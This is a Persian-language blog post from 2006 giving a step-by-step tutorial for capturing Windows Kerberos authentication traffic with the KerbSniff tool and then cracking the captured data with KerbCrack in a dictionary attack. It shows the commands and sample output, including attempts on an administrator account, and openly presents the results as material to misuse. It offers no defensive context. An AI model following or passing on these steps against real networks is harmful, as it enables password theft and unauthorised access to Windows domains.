++ استراق سمع در هنگام تعیین هویت ویندوز !! - برترین مقالات کامپیوتر


برترین مقالات کامپیوتر

برترین مقالات کامپیوتر

شرح کار :

 

کار بسیار ساده است اول میروید به Ntsecurity.nu و دو ابزار  kerbcrack و kerbsniff را دریافت می نمایید . ابزار kerbsniff شبکه را تحت نظر می گیرد و به دنبال اطلاعات تعیین هویت حوزه Kerberos و ، ویندوز میگردد و نتایج را در فایلی که شما برایش مشخص میکنید ذخیره میکند !! بعد با استفاده از ابزار  ورود به زور و با استفاده از یک فرهنگ لغت ابزار kerbcrack را راه اندازی میکنیم تا به هدف خود که همان کلمات عبور باشد دست پیدا کنیم .

 

+ مراحل استفاده از ابزار kerbsniff به شرح زیر است :

 

  1. خود ابزار را راه اندازی میکنیم  ، ابزار شبکه های فعال را تشخیص میدهد و آنها را به ما نمایش میدهد . شما باید یکی از آن ها را انتخاب کنید که من شماره 1  انتخاب کردم !!

 

D:> KerbSniff.exe zxo003.txt

KerbSniff 1.3d3 - (c) 2002-2005, Arne Vidstrom

                      - http://ntsecurity.nu/toolbox/kerbcrack/

 

Available network adapters:

 

0-      192.168.234.34

1-      192.168.234.33

2-      192.168.208.1

4-   192.168.223.1

 

Select the network adapter to sniff on: 1

 

 

  1. حال بر نامه فعال شده و همینجور نیز فعال می ماند ، بعد از مدتی شما بهتر است که ترکیب دو کلید Ctrl+C را استفاده کنید تا برنامه ناکام بماند و شما بتوانید از نتایج بدست آماده حداکثر سوء استفاده را بکنید ، البته اگر چیزی به دست بی آورد !! حالا ما دیگه کاری با این ابزار نداریم

 

++ مراحل استفاده از ابزار kerbcrack به شرح زیر است :

 

  1. این  ابزار مثل بقیه ابزار های از این دست است و بر پایه متد ورود به زور کار میکند ، شیوه استفاده به این صورت زیر است .

 

D:> Kerbcrack.exe zxo003.txt –d dicitionary.txt

KerbCrack 1.3d3 - (c) 2002-2005, Arne Vidstrom

                       - http://ntsecurity.nu/toolbox/kerbcrack/

 

Loaded capture file.

 

Currently working on :

 

Account name                -administrator

From domain                 -VEGAS2

Trying password            -admin

Trying password            -guest

Trying password            -root

 

  1. قابل ذکر است که آخرین کلمه که نمایش میدهد و دیگر تلاش نمی کند آن کلمه ، همان کلمه عبور است .

 

  1. این برنامه یک سری ریزه کاری های دارد خود شما باید آن یاد بگیرید !!

 

نوشته شده در پنج‌شنبه 19 مرداد‌ماه سال 1385ساعت 09:15 توسط ADMIN نظرات (0)|


Design By : Night Skin